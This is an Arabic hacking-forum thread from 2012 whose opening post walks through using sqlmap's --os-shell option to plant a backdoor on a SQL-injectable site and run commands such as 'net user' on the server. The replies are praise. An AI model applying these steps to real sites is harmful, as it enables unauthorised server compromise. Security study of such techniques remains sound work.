:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap (http://www.vbspiders.com/vb/t66281.html)

Spiral 12-22-2012 06:02 PM

رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap
 
السلام عليكم

رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap

هذه الخاصية موجودة في اداة sqlmap وشفتها مشروحة في منتدى اجنبي وحبيتها اشرحها لكم

ندخل في الشرح على طول

اولا: نفتح موجة الأوامر ونذهب للمسار التالي عن طريق الأمر

كود PHP:

 cd /pentest/database/sqlmap 

http://www.mlfnt.com/lives6/13561835571.jpg

ثانيا: نطبق الأمر التالي

كود PHP:

./sqlmap.py -u http://www.site.com/file.php?id=1 --os-shell 

مع استبدال الرابط الى رابط الملف المصاب

http://www.mlfnt.com/lives6/13561835582.jpg

ثالثا: راح يطلب منا نوع اللغة التي يدعمها السيرفر وانا السيرفر يلي معي يدعم PHP لذلك ندخل الرقم 3

http://www.mlfnt.com/lives6/13561835583.jpg

رابعا: راح يطلب منا مسار الروت للسيرفر وانا السيرفر معي كان ويندوز وادخلت C:/xampp/htdocs/ وطبعا المسار نقدر نطوله من اي خطأ في الموقع او اي خطأ موجود في احدى مواقع السيرفر

http://www.mlfnt.com/lives6/13561835584.jpg

خامسا: راح يطلب منا اي مسار موجود في السيرفر حتى يحاول رفع الشيل او الباك دور عليه وانا ادخلت المسار كما في الصورة (سيرفر خاص)

http://www.mlfnt.com/lives6/13561835595.jpg

سادسا: تم رفع الباك دور والاتصال بنجاح كما في الصورة

http://www.mlfnt.com/lives6/13561835596.jpg

سابعا: نجرب نطبق احد الاوامر وانا زي ما قتلكم السيرفر يلي مستهدفه ويندوز لذلك نطبق احد اوامر الويندوز وليكن net user

http://www.mlfnt.com/lives6/13561835597.jpg

تمام تم التطبيق بنجاح وايضا يمكنك استبدال الباك دور بالشيل الخاص بك او جلب شيل من خارج السيرفر او التعديل على اي ملف موجود في السيرفر من خلال الأوامر

الفكرة هذه موجودة اصلا في اداة sqlmap والمعظم ما يعرفها لذلك قلت اشرحها للشباب واتمنى يكون كل شي واضح

الشرح اهداء لـ :
b0x | tnt_hacker | sql_master | j0rd4n14n.r1z | dzx | the final doom | security999 | alh7nooty

aircrack -ng 12-22-2012 11:41 PM

رد: رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap
 
باراك الله فيك حبيبي
شرح جميل ومنسق
بس قولي انت تشتغل من ورايا ولا ايه هههههههههه
موفق باذن الله

Kamo_DZ 12-22-2012 11:51 PM

رد: رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap
 
أستااااااااااااد
مشاء الله عليكم
أنا فترة جنتني اداة sqlmap ههههه بسببها تركت الهكر فترة ههههه

تقبل تحياتي

خالد سعودي 12-23-2012 12:14 AM

رد: رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap
 
شكرا

Spiral 12-23-2012 04:12 AM

رد: رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap
 
اقتباس:

المشاركة الأصلية كتبت بواسطة aircrack -ng (المشاركة 456427)
باراك الله فيك حبيبي
شرح جميل ومنسق
بس قولي انت تشتغل من ورايا ولا ايه هههههههههه
موفق باذن الله

انت استاذنا في ال sql يا وحش ال sql ههههههههههههه

دام علاء العماد 12-23-2012 10:19 PM

رد: رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap
 
موضوع رائع يا أخي الكريم ن بارك الله فيك و جزاك الله عنا كل خير


الساعة الآن 01:00 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0